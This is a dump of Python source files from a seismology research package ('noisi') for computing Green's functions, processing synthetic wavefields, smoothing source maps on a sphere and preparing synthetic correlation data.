_update_conjugategrad(new_sourcemodel,neg_grad,old_grad,\n\told_upd,new_update,step_length)\n\tnp.save(new_update,update)\n\n\nsrc_model.model['distr_basis'][:] += descent_direction\n\n\nif src_model.model['distr_basis'][:].min() < 0.:\n\t\twarn('Step length leads to negative source model...reset values to be >=0.')\n\t\tsrc_model.model['distr_basis'][:] = src_model.model['distr_basis'][:].clip(0.0)\n\nsrc_model.model.close()\n# (outside of this script) forward model selected correlations\n# (outside of this script) evaluate misfit for selected correlations\n"
},
{
"alpha_fraction": 0.5355972647666931,
"alphanum_fraction": 0.5823652148246765,
"avg_line_length": 25.81599998474121,
"blob_id": "e6607c70b795d751ee9029fa29516e3acc3ba868",
"content_id": "76bdf6f8ec89dbe1a451b8137903d834d778ae7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Python",
"length_bytes": 3357,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 125,
"path": "/noisi/test/testdata/testsrc/setting_up_testmodel/precompute_1DGreen.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "\n# coding: utf-8\n\n# In[1]:\n\n# Precompute a 1-D Green's function for a homogeneous membrane medium\nimport numpy as np\nimport os\nimport h5py\nfrom math import sqrt, pi\nfrom scipy.signal import hann\nfrom obspy.geodetics import gps2dist_azimuth\nimport matplotlib.pyplot as plt\nimport sys\n\n# In[2]:\n\n#stations_file = sys.argv[1]\n#stations = open(stations_file,'r').read().split('\\n')\n\n#rec_codes = []\n#rec_locations = []\n\n#for sta in stations:\n# if sta=='':\n# continue\n# inf = sta.split()\n# rec_codes.append(inf[0].strip()+'.'+inf[1].strip())\n# rec_locations.append([float(inf[2]),float(inf[3])])\n\n\n# set the parameters\noutput_location = './wavefield_vel'\nsrcgrid = np.load('./sourcegrid.npy')\nrec_codes = ['NET.STA1..CHA','NET.STA2..CHA']#['BO.SAG..BHZ','BO.NSK..BHZ','BO.KMT..BHZ','BO.IZH..BHZ']\nrec_locations = [[-1.,-1.],[1.,1.]]#[[36.2553,133.3050],[34.3403,132.0018],[33.6782,135.4899],[34.1359,129.2066]]\nv_phase = 3300.\nv_group = 2400.\nq = 100.\nrho = 3300.\nFs = 1.0\n\nnpts = 360\n# Apply a freq. domain taper to suppress high and low frequencies.\nfilt = [0.02,0.2]\ndata_quantity = 'VEL'\nntraces = len(srcgrid[0])\n\n\n# In[3]:\n\nfreq = np.fft.rfftfreq(2*int(npts),d=1.0/Fs)\nw = 2 * pi * freq\ng_fd = np.zeros(freq.shape,dtype=np.complex)\n\ndef green_membrane(r,plot=False):\n \n if data_quantity == 'DIS':\n fac1 = -1j*1./(rho*v_phase**2*4.)\n elif data_quantity == 'VEL':\n fac1 = w[1:]*1./(rho*v_phase**2*4.)\n fac2 = np.sqrt((2.*v_phase)/(pi*w[1:]*r))\n phase = -1j * w[1:] / v_phase * r + 1j * pi / 4.0\n decay = -(w[1:]*r)/(2.*v_phase*q)\n \n g_fd[1:] = fac1*fac2*np.exp(phase)*np.exp(decay)\n if plot:\n plt.plot(freq,np.abs(g_fd))\n plt.show()\n return g_fd\n\n\n# In[4]:\n\nfor i in range(len(rec_codes)):\n if not os.path.exists(output_location):\n os.mkdir(output_location)\n\n station = rec_codes[i]\n lat_sta = rec_locations[i][0]\n lon_sta = rec_locations[i][1]\n\n # initialize the file\n\n f_out_name = os.path.join(output_location, station + '.h5') \n with h5py.File(f_out_name, \"w\") as f_out:\n\n # DATASET NR 1: STATS\n stats = f_out.create_dataset('stats',data=(0,))\n stats.attrs['reference_station'] = station\n stats.attrs['data_quantity'] = data_quantity\n stats.attrs['ntraces'] = ntraces\n stats.attrs['Fs'] = Fs\n stats.attrs['nt'] = int(npts)\n\n # DATASET NR 2: Source grid\n sources = f_out.create_dataset('sourcegrid',data=srcgrid)\n\n # DATASET Nr 3: Seismograms itself\n traces = f_out.create_dataset('data',(ntraces,npts),dtype=np.float32)\n\n for k in range(ntraces):\n # for each location, determine the distance\n lat = srcgrid[1,k]\n lon = srcgrid[0,k]\n\n r = gps2dist_azimuth(lat,lon,lat_sta,lon_sta)[0]\n\n # evaluate the Greens fct.\n g1 = green_membrane(r)\n\n # apply the freq. domain taper\n taper = np.zeros(freq.shape)\n i0 = np.argmin(np.abs(freq-filt[0]))\n i1 = np.argmin(np.abs(freq-filt[1]))\n\n taper[i0:i1] = hann(i1-i0)\n\n # transform back to time domain\n g1_td = np.fft.irfft(g1)[0:npts]\n g1_td_taper = np.fft.irfft(taper*g1)[0:npts]\n\n\n # write the result\n traces[k,:] = g1_td_taper * 1.e10\n f_out.flush()\n\n\n\n\n"
},
{
"alpha_fraction": 0.7878788113594055,
"alphanum_fraction": 0.7878788113594055,
"avg_line_length": 33,
"blob_id": "4758bd06d1706e4f07eacdedb84566d74c528dd2",
"content_id": "26b457da5be2cf40195b109116cd81fd119aec47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 33,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 1,
"path": "/noisi/util/__init__.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "#from noisi.util.various import *"
},
{
"alpha_fraction": 0.629302978515625,
"alphanum_fraction": 0.6472261548042297,
"avg_line_length": 27.11199951171875,
"blob_id": "748b357d8102b4d94ee8124d247cc318a591a82d",
"content_id": "9e9a458eedf1292a9d003af1a69f48d6bc73b0cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3515,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 125,
"path": "/noisi/util/wavefield_from_instaseis.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "# create a wavefield from instaseis\nfrom mpi4py import MPI\nimport instaseis\nimport h5py\nimport os\nimport sys\nfrom pandas import read_csv\nimport numpy as np\nimport json\nfrom noisi.util.geo import geograph_to_geocent\nfrom obspy.geodetics import gps2dist_azimuth\n\ncomm = MPI.COMM_WORLD\nsize = comm.Get_size()\nrank = comm.Get_rank()\n\n\n# get config\nsource_config=json.load(open('source_config.json'))\nconfig = json.load(open('../config.json'))\nFs = source_config['sampling_rate']\npath_to_db = config['wavefield_path']\nchannel = source_config['channel']\n\n# read sourcegrid\nf_sources = np.load('../sourcegrid.npy')\nntraces = f_sources.shape[-1]\n\n# open the database\ndb = instaseis.open_db(path_to_db)\n\n# get: synthetics duration and sampling rate in Hz\nstest = db.get_seismograms(source=instaseis.ForceSource(latitude=0.0,\n longitude=0.0),receiver=instaseis.Receiver(latitude=10.,\n longitude=0.0),dt=1./source_config['sampling_rate'])[0]\nntimesteps = stest.stats.npts\n\n\n# read station from file\nstationlist = read_csv('../stationlist.csv')\nnet = stationlist.at[rank,'net']\nsta = stationlist.at[rank,'sta']\nlat = stationlist.at[rank,'lat']\nlon = stationlist.at[rank,'lon']\nprint(net,sta,lat,lon)\n\n\n# output directory:\nif rank == 0:\n\tos.system('mkdir -p wavefield_processed')\n \ncomm.barrier()\n\nf_out_name = '{}.{}..{}.h5'.format(net,sta,channel)\nf_out_name = os.path.join('wavefield_processed',f_out_name)\n\n\nif not os.path.exists(f_out_name):\n\n startindex = 0\n\n f_out = h5py.File(f_out_name, \"w\")\n \n # DATASET NR 1: STATS\n stats = f_out.create_dataset('stats',data=(0,))\n stats.attrs['reference_station'] = '{}.{}'.format(net,sta)\n stats.attrs['data_quantity'] = config['synt_data']\n stats.attrs['ntraces'] = ntraces\n stats.attrs['Fs'] = Fs\n stats.attrs['nt'] = int(ntimesteps)\n \n # DATASET NR 2: Source grid\n sources = f_out.create_dataset('sourcegrid',data=f_sources[0:2])\n lat1 = geograph_to_geocent(float(lat))\n lon1 = float(lon)\n rec1 = instaseis.Receiver(latitude=lat1,longitude=lon1)\n \n # DATASET Nr 3: Seismograms itself\n traces = f_out.create_dataset('data',(ntraces,ntimesteps),dtype=np.float32)\n if channel[-1] == 'Z':\n \tc_index = 0\n elif channel[-1] == 'R':\n \tc_index = 1\n elif channel[-1] == 'T':\n \tc_index = 2\n\nelse:\n f_out = h5py.File(f_out_name, \"r+\")\n startindex = len(f_out['data']) \n\n\n# jump to the beginning of the trace in the binary file\nfor i in range(startindex,ntraces):\n if i%1000 == 1:\n print('Converted %g of %g traces' %(i,ntraces))\n # read station name, copy to output file\n \n lat_src = geograph_to_geocent(f_sources[1,i])\n lon_src = f_sources[0,i]\n\n ######### ToDo! Right now, only either horizontal or vertical component sources ##########\n if c_index in [1,2]:\n fsrc = instaseis.ForceSource(latitude=lat_src,\n longitude=lon_src,f_t=1.e09,f_p=1.e09)\n elif c_index == 0:\n fsrc = instaseis.ForceSource(latitude=lat_src,\n longitude=lon_src,f_r=1.e09)\n\n values = db.get_seismograms(source=fsrc,receiver=rec1,dt=1./Fs)\n \n if c_index in [1,2]:\n \tbaz = gps2dist_azimuth(lat_src,lon_src,lat,lon)[2]\n \tvalues.rotate('NE->RT',back_azimuth=baz)\n\n values = values[c_index]\n\n if config['synt_data'] in ['VEL','ACC']:\n \tvalues.differentiate()\n \tif config['synt_data'] == 'ACC':\n \t\tvalues.differentiate()\n # Save in traces array\n traces[i,:] = values.data\n \n \nf_out.close()\n\n"
},
{
"alpha_fraction": 0.6412961483001709,
"alphanum_fraction": 0.6684250235557556,
"avg_line_length": 36.91428756713867,
"blob_id": "924278ed64cf472df0bb8bdb8ca59b2c0241cf94",
"content_id": "718aa0bb303568a04a8cd300ba2d5d74ef49a944",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1327,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 35,
"path": "/noisi/test/test_gradient.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import os\nimport numpy as np\n\ndef test_gradient():\n # copy data\n os.mkdir('test/testdata/testsrc/step_0/grad')\n os.mkdir('test/testdata/testsrc/step_0/kern')\n os.system('cp test/testdata/testsrc/step_0/kern_archived/NET.STA1..CHA--NET.STA2..CHA.npy \\\n test/testdata/testsrc/step_0/kern/NET.STA1..CHA--NET.STA2..CHA.0.npy')\n os.system('cp test/testdata/testsrc/step_0/ln_energy_ratio.measurement_archived.csv\\\n test/testdata/testsrc/step_0/ln_energy_ratio.0.measurement.csv')\n os.system('cp test/testdata/testsrc/step_0/starting_model_archived.h5\\\n test/testdata/testsrc/step_0/starting_model.h5')\n\n\n # run forward model\n os.system('noisi gradient test/testdata/testsrc/ 0')\n\n # assert the results are the same\n # ToDo: path\n \n g1 = np.load('test/testdata/testsrc/step_0/grad_archived/grad_all.npy')[0,:]\n g2 = np.load('test/testdata/testsrc/step_0/grad/grad_all.npy')[0,:]\n \n print(g1 == g2)\n print((g1 == g2).sum())\n\n assert (g1 == g2).sum() == len(g2)\n \n \n # remove stuff\n os.system('rm -rf test/testdata/testsrc/step_0/grad/')\n os.system('rm -rf test/testdata/testsrc/step_0/kern/')\n os.system('rm test/testdata/testsrc/step_0/starting_model.h5')\n os.system('rm test/testdata/testsrc/step_0/ln_energy_ratio.0.measurement.csv')\n"
},
{
"alpha_fraction": 0.6144301891326904,
"alphanum_fraction": 0.6288604140281677,
"avg_line_length": 32.63181686401367,
"blob_id": "a0b83c70cef9a011002c919c4482c4b5a7c6ec01",
"content_id": "0373ac14be73e3005de87e0e701b0b23b164b5e4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7415,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 220,
"path": "/noisi/util/parse_specfem_output.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "#!/users/lermert/anaconda2/bin/python\n# path to python has to be included here\n\n# A script to filter and downsample binary specfem output using python\n# This script is specially adapted to the specfem unformatted fortran binary output.\n\n\n# Tasks: \n# - Get filter coefficients\n# - read in trace\n# - apply filter to trace\n# - apply downsampling or interpolation to trace\n# - append trace to a new binary file \n# - parallelize in a sensible way\n# - include an option to extract only the z component\n# - transfer output to hdf5\n\nfrom mpi4py import MPI\nfrom scipy.signal import iirfilter, lfilter\nfrom obspy import Trace\nfrom obspy.signal.invsim import cosine_taper\nimport numpy as np\nimport os\nimport sys\nfrom warnings import warn\nfrom scipy.signal import cheb2ord, cheby2\ntry:\n from scipy.signal import zpk2sos, sosfilt\nexcept ImportError:\n from obspy.signal._sosfilt import _sosfilt as sosfilt\n from obspy.signal._sosfilt import _zpk2sos as zpk2sos\n#ToDo: build in a more stable filter (?); cut off the first x seconds before zero time; take derivative! \n# ToDo: Write directly to hdf5? (The nice thing about unformatted bin is convenient concatenating)\n\n\n#- User input: -----------------------------------------\n#-------------------------------------------------------\nntimesteps=95400 # nr. of time steps, find in specfem output\nduration= 300.430176 * 60. + 100. #duration of synthetics in seconds (look up in specfem output, it's given in minutes there)\noffset_seconds = 100. # This is the added time specfem adds before t=0 to account for the source 'rise time'.\nncomponents = 3\nnbytes_stationname = 512\nsize_of_float = 4\ndtype_output = 'f4'\noutput_quantity = 'VEL'\noutput_directory = '/scratch/daint/lermert/output_decimated/'\nchannel = 'MXZ' # 'all' or specify channels as in specfem output, e.g. 'MXZ'\nfreq = 0.05 # Lowpass corner\nfs_new = 0.4 # Interpolate to new sampling rate in Hz \n\n#------------------------------------------------------\n#------------------------------------------------------\n\ndef cheby2_lowpass(df,freq,maxorder=8):\n # From obspy\n nyquist = df * 0.5\n # rp - maximum ripple of passband, rs - attenuation of stopband\n rp, rs, order = 1, 96, 1e99\n ws = freq / nyquist # stop band frequency\n wp = ws # pass band frequency\n # raise for some bad scenarios\n if ws > 1:\n ws = 1.0\n msg = \"Selected corner frequency is above Nyquist. \" + \\\n \"Setting Nyquist as high corner.\"\n warnings.warn(msg)\n while True:\n if order <= maxorder:\n break\n wp = wp * 0.99\n order, wn = cheb2ord(wp, ws, rp, rs, analog=0)\n return cheby2(order, rs, wn, btype='low', analog=0, output='zpk')\n \n \n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = comm.Get_size()\nprint(\"Hello from rank \",rank)\nprint(\"Size is \",size)\n\ntry:\n f_in = sys.argv[1]\nexcept IndexError:\n msg = 'Usage: python decimate_synthetics.py <path to input file>'\n raise ValueError(msg)\n \nprint('Setting output file name according to input file name provided on command line:')\nstation = os.path.splitext(os.path.basename(f_in))[0]\nf_out = \"%s..%s.%gHz.bin_%g\" %(station,channel,fs_new,rank)\ndir_out = os.path.join(output_directory,'{}..{}'.format(station,channel))\nf_out = os.path.join(dir_out,f_out)\nif rank == 0:\n os.system('mkdir -p '+dir_out)\ncomm.Barrier()\n\nprint(f_out)\n# Separate output files for different cores - otherwise would have to keep track of sequence of traces\nf_out = open(f_out,'wb')\n\n\n# Record lengths:\nnbytes_trace = nbytes_stationname + 8 + ntimesteps * \\\nsize_of_float * 2 + 16\nnbytes_station = nbytes_trace * ncomponents\n\n# Number of records actually contained\nnstations = os.path.getsize(f_in) / nbytes_station\nprint('Number of station records: '+nstations)\n\n\n# Open files:\nf_in = open(f_in,'rb')\n\n# Read an example time axis\nf_in.seek(nbytes_stationname+8+4)\nexamp_time = np.zeros(ntimesteps)\nexamp_time = np.fromfile(f_in,dtype='f',count=ntimesteps)\n \nprint('Prescribed duration: '+ duration)\nprint('Inferred duration: ', examp_time[-1]-examp_time[0])\n#dt = np.sum(np.abs(examp_time[:-1])) / (ntimesteps-1)\ndt = duration / ntimesteps\ndt_test = abs(examp_time[-1]-examp_time[0]) / ntimesteps\n\nif dt_test != dt and rank == 0:\n msg = 'Small discrepancy between inferred and prescribed sampling rate:' \n warn(msg)\n print(dt)\n print(dt_test)\n \n# Determine the sampling rate\nfs_old = 1./dt\n\n# Get filter coeff\nz, p, k = cheby2_lowpass(fs_old,freq)\nsos = zpk2sos(z, p, k)\n\n# Determine which channels to save...\nif channel is not 'all':\n cha_incr = 3\n if channel == 'MXN':\n cha_offset = 0\n elif channel == 'MXE':\n cha_offset = 1\n elif channel == 'MXZ':\n cha_offset = 2\nelse:\n cha_incr = 1\n cha_offset = 0 \n\ncounter = 0\ntotal_traces = ncomponents * nstations\n\nfor ns in range(rank,nstations,size): \n for nc in range(cha_offset,ncomponents,cha_incr):\n \n if counter%1000 == 0: \n print('Completed %s out of approx %s traces' %(counter,round(total_traces/size)))\n \n # jump to the beginning of the entry in the binary file\n f_in.seek(ns * nbytes_station + nc * nbytes_trace + 4)\n \n # read station name, copy to output file\n staname=f_in.read(nbytes_stationname)\n if channel != 'all' and channel not in staname.split('.'):\n msg = 'Something went wrong with reading, please double check\\\n number of time steps and other user input.'\n raise ValueError(msg)\n \n \n # Numpy arrays are double precision by default, maybe use single?\n values = np.zeros(ntimesteps,dtype=np.dtype(dtype_output))\n infnr = np.zeros(2,dtype=np.dtype(dtype_output))\n \n # Jump over the station name and the time axis record....\n f_in.seek( ns * nbytes_station + nc * nbytes_trace + nbytes_stationname +\\\n 8 + ntimesteps * size_of_float + 12 )\n \n #for nt in range(ntimesteps):\n # values[nt] = np.fromfile(f_in,dtype=dtype_output,count=1)\n values = np.fromfile(f_in,dtype=dtype_output,count=ntimesteps)\n \n tr = Trace(data=values)\n \n \n # Filter and downsample\n # Since the same filter will be applied to all synthetics consistently, non-zero-phase should be okay\n # ToDo: Think about whether zerophase would be better\n \n # taper first\n #ToDo: Discuss with Andreas whether this tapering makes sense!\n tr.taper(type='cosine',max_percentage=0.001)\n tr.data = sosfilt(sos,tr.data)\n tr.stats.sampling_rate = fs_old\n tr.interpolate(fs_new)\n \n # Differentiate\n if output_quantity == 'VEL' or output_quantity == 'ACC':\n tr.differentiate()\n if output_quantity == 'ACC':\n tr.differentiate()\n \n \n # Remove the extra time that specfem added\n tr.trim(starttime = tr.stats.starttime+offset_seconds)\n \n # Set data type\n tr.data = tr.data.astype(dtype_output)\n \n\n infnr[0] += tr.stats.npts\n infnr[1] += tr.stats.sampling_rate\n \n f_out.write(staname)\n infnr.tofile(f_out)\n tr.data.tofile(f_out)\n counter +=1\nprint('New nr. of time steps after interpolation: '+ tr.stats.npts)\nf_out.close()\n \n\n \n\n"
},
{
"alpha_fraction": 0.5676073431968689,
"alphanum_fraction": 0.5899386405944824,
"avg_line_length": 23.359281539916992,
"blob_id": "1a03f2ffc904ddfa48082d7c48522f5b2233e9a8",
"content_id": "218ec5ea16507ed799e79ddc189bf31b06e0ee9e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4075,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 167,
"path": "/noisi/util/smoothing.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom math import sqrt, pi\nimport sys\nfrom mpi4py import MPI\nfrom warnings import warn\ntry:\n from noisi.util.plot import plot_grid\nexcept:\n pass\n# Try yet another: sort of Gaussian convolution, but determining the distance\n# in cartesian coordinates.\n # initialize parallel comm\ncomm = MPI.COMM_WORLD\nsize = comm.Get_size()\nrank = comm.Get_rank()\n\n\ndef get_distance(gridx,gridy,gridz,x,y,z):\n #def distance_function(x1,y1,z1,x2,y2,z2):\n # return sqrt((x2-x1)**2+(y2-y1)**2+(z2-z1)**2)\n #dist = np.array([distance_function()])\n xd = gridx - x\n yd = gridy - y\n zd = gridz - z\n \n return np.sqrt(np.power(xd,2)+np.power(yd,2)+np.power(zd,2))\n\n\n\ndef smooth_gaussian(values,coords,rank,size,sigma,r=6371000.,threshold=1e-9):\n\n # coords format: (lon,lat)\n\n # step 1: Cartesian coordinates of map\n theta = np.deg2rad(-coords[1] + 90.) \n phi = np.deg2rad(coords[0] + 180.)\n\n x = r*np.sin(theta) * np.cos(phi)\n y = r*np.sin(theta) * np.sin(phi)\n z = r*np.cos(theta)\n\n\n v_smooth = np.zeros(values.shape)\n\n\n a = 1./(sigma*sqrt(2.*pi))\n \n for i in range(rank,len(values),size):\n \n xp,yp,zp = (x[i],y[i],z[i])\n dist = get_distance(x,y,z,xp,yp,zp)\n weight = a * np.exp(-(dist)**2/(2*sigma**2))\n #print(weight.max())\n # I just had an idea for 'sparsity' here; test this:\n\n idx = weight >= threshold\n\n if idx.sum() == 0:\n warn('No weights above threshold, reset threshold.')\n v_smooth[i] = 0.\n\n else:\n v_smooth[i] = np.sum(np.multiply(weight[idx],values[idx])) / idx.sum()\n \n\n return v_smooth\n\n\ndef apply_smoothing_sphere(rank,size,values,coords,sigma,cap=95,threshold=1.e-12):\n\n\n sigma = float(sigma)\n cap = float(cap)\n threshold = float(threshold)\n\n # clip\n perc_up = np.percentile(values,cap,overwrite_input=False)\n perc_dw = np.percentile(values,100-cap,overwrite_input=False)\n values = np.clip(values,perc_dw,perc_up)\n\n \n\n # get the smoothed map; could use other functions than Gaussian here\n v_s = smooth_gaussian(values,coords,rank,size,sigma,threshold=threshold)\n \n\n \n comm.barrier()\n \n # collect the values\n print('Gathering...')\n v_s_all = comm.gather(v_s,root=0)\n # rank 0: save the values\n if rank == 0:\n \n print('Gathered.')\n v_s = np.zeros(v_s.shape)\n for i in range(size):\n\n v_s += v_s_all[i]\n \n return(v_s)\n\ndef test_gauss_smoothing(sourcegrid,map):\n #\n grd = np.load(sourcegrid)[:,0:10000]\n v = np.ones(grd.shape[1])\n ihalf = grd.shape[1] // 2\n v[ihalf:] = 10\n np.save('temp_coord.npy',grd)\n np.save('temp_vals.npy',v)\n plot_grid(grd[0],grd[1],v)\n\n smooth_map = apply_smoothing_sphere('temp_vals.npy',\n 'test','temp_coord.npy',500000)\n print(smooth_map.shape)\n\n plot_grid(grd[0],grd[1],smooth_map)\n\n\ndef smooth(inputfile,outputfile,coordfile,sigma,cap,thresh):\n\n for ixs in range(len(sigma)):\n sigma[ixs] = float(sigma[ixs])\n\n\n\n coords = np.load(coordfile)\n values = np.array(np.load(inputfile),ndmin=2)\n smoothed_values = np.zeros(values.shape)\n \n\n for i in range(values.shape[0]):\n\n array_in = values[i,:]\n try:\n sig = sigma[i]\n except IndexError:\n sig = sigma[-1]\n\n v = apply_smoothing_sphere(rank,size,array_in,\\\n coords,sig,cap,threshold=thresh)\n if rank == 0:\n smoothed_values[i,:] = v\n print(np.isnan(smoothed_values).sum())\n\n if rank == 0:\n np.save(outputfile,smoothed_values)\n\n\n\nif __name__=='__main__':\n\n # pass in: input_file, output_file, coord_file, sigma\n # open the files\n inputfile = sys.argv[1]\n outputfile = sys.argv[2]\n coordfile = sys.argv[3]\n sigma = sys.argv[4].split(',')\n cap = float(sys.argv[5])\n \n try:\n thresh = float(sys.argv[6])\n except IndexError:\n thresh = 1.e-12\n\n smooth(inputfile,outputfile,coordfile,sigma,cap,thresh)\n\n\n \n"
},
{
"alpha_fraction": 0.5163956880569458,
"alphanum_fraction": 0.5213557481765747,
"avg_line_length": 34.3564338684082,
"blob_id": "4982bde2eda8dd5dec3808416db464659664e4e5",
"content_id": "06e74e8ade5b85334e555bbc5e70a21fc1668cd1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3629,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 101,
"path": "/noisi/scripts/run_preprocessing.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "from mpi4py import MPI\nfrom noisi import WaveField\nimport os\nfrom glob import glob\nimport json\n\ndef run_preprocessing(source_config):\n\n configfile = os.path.join(source_config['project_path'],\n 'config.json')\n config = json.load(open(configfile))\n \n files = glob(os.path.join(config['wavefield_path'],'*.h5'))\n processed_path = os.path.join(source_config['source_path'],\n 'wavefield_processed')\n \n if not os.path.exists(processed_path):\n os.mkdir(processed_path)\n \n # very simple embarrassingly parallel loop\n comm = MPI.COMM_WORLD\n size = comm.Get_size()\n rank = comm. Get_rank()\n\n files = files[rank::size]\n \n for file in files:\n\n newfile = os.path.join(processed_path, os.path.basename(file))\n\n if os.path.exists(newfile):\n print(\"File {} was already processed, skipping.\".format(os.path.basename(file)))\n continue\n\n else:\n print(\"Preprocessing {}\".format(os.path.basename(file)))\n \n\n \n if source_config['preprocess_truncate_sec'] is not None:\n \n # truncating\n \n with WaveField(file) as wf:\n wf.truncate(newfile,float(source_config['preprocess_truncate_sec']))\n\n\n if source_config['preprocess_decimation_factor'] is not None:\n\n # Already truncated file?\n if os.path.exists(newfile):\n newfile_temp = newfile + '.temp'\n with WaveField(newfile) as wf:\n wf.decimate(decimation_factor=source_config['preprocess_decimation_factor'],\n outfile=newfile_temp,\n taper_width=0.005)\n os.system(\"mv {} {}\".format(newfile_temp,newfile))\n else:\n with WaveField(file) as wf:\n wf.decimate(decimation_factor=source_config['preprocess_decimation_factor'],\n outfile=newfile,\n taper_width=0.005)\n \n\n\n\n\n \n if source_config['preprocess_filter_kind'] == 'bandpass':\n\n # The file has been written previously by wavefield.truncate\n if os.path.exists(newfile):\n with WaveField(newfile,w='a') as wf:\n wf.filter_all(\n source_config['preprocess_filter_kind'],\n overwrite=True,\n freqmin=source_config['preprocess_filter_params'][0],\n freqmax=source_config['preprocess_filter_params'][1],\n corners=source_config['preprocess_filter_params'][2],\n zerophase=source_config['preprocess_filter_params'][3])\n\n else:\n # The file still has to be written\n with WaveField(file) as wf:\n wf.filter_all(\n source_config['preprocess_filter_kind'],\n overwrite=False,\n freqmin=source_config['preprocess_filter_params'][0],\n freqmax=source_config['preprocess_filter_params'][1],\n corners=source_config['preprocess_filter_params'][2],\n zerophase=source_config['preprocess_filter_params'][3],\n outfile=newfile)\n\n\n\n # filtering type,overwrite=False,zerophase=True,**kwargs\n #with WaveField(newfile) as wf:\n \n \n \n # wf.filter_all()\n \n \n \n \n \n \n"
},
{
"alpha_fraction": 0.63331139087677,
"alphanum_fraction": 0.6540487408638,
"avg_line_length": 29.3799991607666,
"blob_id": "c36504a59793e9464a2e7d280c623009dfb052f6",
"content_id": "b2aba3554790ceff57c8880da04f65890f515038",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6076,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 200,
"path": "/noisi/util/make_synthetic_data.py",
"repo_name": "jigel/noisi",
"src_encoding": "UTF-8",
"text": "# # Make synthetic data from modelled data\n\n# NOTE: This Jupyter Notebook should be run in /project_name/source_name until arguments can be put in externally.\n# Expects stationlist.csv, modelled correlations\n\n# The aim is to calculate the kernels. To do this, observed correlation data is necessary. This script converts modelled data to synthetic data.\n\nimport os\nimport glob\nimport shutil\nimport obspy\nimport pandas as pd\nfrom obspy import read\nfrom obspy.geodetics import gps2dist_azimuth\nimport numpy as np\nimport sys\nfrom glob import glob\nfrom obspy.core import AttribDict\n\n\n\n# For dataless conversion set it to true\ndataless = True\ncorr_filt_sectionplot = True\n\n# Get Project name\nproject_name = os.path.basename(os.path.dirname(os.getcwd()))\n# print(project_name)\n\n# first get paths to different files\npath_stations = ('../stationlist.csv')\npath_model = ('./step_0/corr/')\npath_obs = ('./observed_correlations/')\n\n# ABOVE CAN BE CHANGED FOR PYTHON SCRIPT TO RUN WITH INPUT ARGUMENTS, see Laura's code\n\nif dataless:\n # delete files in observed_correlations folder if necessary\n for files in glob(os.path.join(path_obs,'*')):\n os.remove(files)\n # copy files from the synthetic correlations to the observed correlations '/Source_1/observed_correlations/'\n for files in glob(os.path.join(path_model,'*.sac')):\n shutil.copy(files,path_obs)\n print('Copied:',files)\n\n\n# Rename files as noisi expects different filename\nfor filename in glob(os.path.join(path_obs,'*.sac*')):\n # make sure they're not renamed if they've already been renamed\n if filename.endswith(project_name + '.sac'): \n break\n else:\n # get filename without extension\n filename_wo_ext = os.path.splitext(filename)[0]\n ext = os.path.splitext(filename)[1]\n # change -- to . and add project name and extension\n filename_1 = filename_wo_ext.replace('--','.')\n filename_2 = filename_1 + '.' + project_name + ext\n # rename the file\n os.rename(filename,filename_2)\n print('Renamed:', filename_2)\n\n\n# Check metadata in observed_correlations folder\n# load the correlations into a file with obspy\next = '*.sac'\ncorrs_path_obs = os.path.join(path_obs,ext) # get all .sac files in directory\nst = obspy.read(corrs_path_obs) # load all into one stream\n# print(st)\n#print(st[0].stats)\n\n\n# # Laura's code: assign_geodata.py\n\n# Changed the indir and metafile input so it would run in this notebook. \n# For meta = .. engine = 'python' has been added.\n\n#indir = sys.argv[1]\n#metafile = sys.argv[2]\nindir = path_obs\nmetafile = '../stationlist.csv'\n\n\nprint(indir)\ntraces = glob(indir+'/*.SAC')\ntraces.extend(glob(indir+'/*.sac'))\nprint('Found traces:\\n')\nprint(traces[0])\nprint('...to...')\nprint(traces[-1])\nprint('\\n')\nprint('Assign geographical information.\\n')\nprint('Number of traces:')\nprint(np.size(traces))\nprint('\\n')\n\nmeta = pd.read_csv(metafile, engine='python')\n\nfor t in traces:\n tr = read(t)\n sta1 = os.path.basename(t).split('.')[1]\n try:\n sta2 = os.path.basename(t).split('--')[1].split('.')[1]\n except IndexError:\n sta2 = os.path.basename(t).split('.')[5]\n print(sta1,sta2)\n lat1 = float(meta[meta['sta']==sta1].iloc[0]['lat'])\n lat2 = float(meta[meta['sta']==sta2].iloc[0]['lat'])\n lon1 = float(meta[meta['sta']==sta1].iloc[0]['lon'])\n lon2 = float(meta[meta['sta']==sta2].iloc[0]['lon'])\n print(lat1,lon1,lat2,lon2)\n \n tr[0].stats.network = os.path.basename(t).split('.')[0]\n tr[0].stats.station = sta1\n tr[0].stats.location = ''\n tr[0].stats.channel = os.path.basename(t).split('.')[3] #os.path.basename(t).split('.')[3].split('--')[0]\n tr[0].stats.sac.stlo = lon1\n tr[0].stats.sac.stla = lat1\n tr[0].stats.sac.evlo = lon2\n tr[0].stats.sac.evla = lat2\n tr[0].stats.sac.kuser0 = meta[meta['sta']==sta2].iloc[0]['net']\n \n tr[0].stats.sac.kevnm = sta2\n 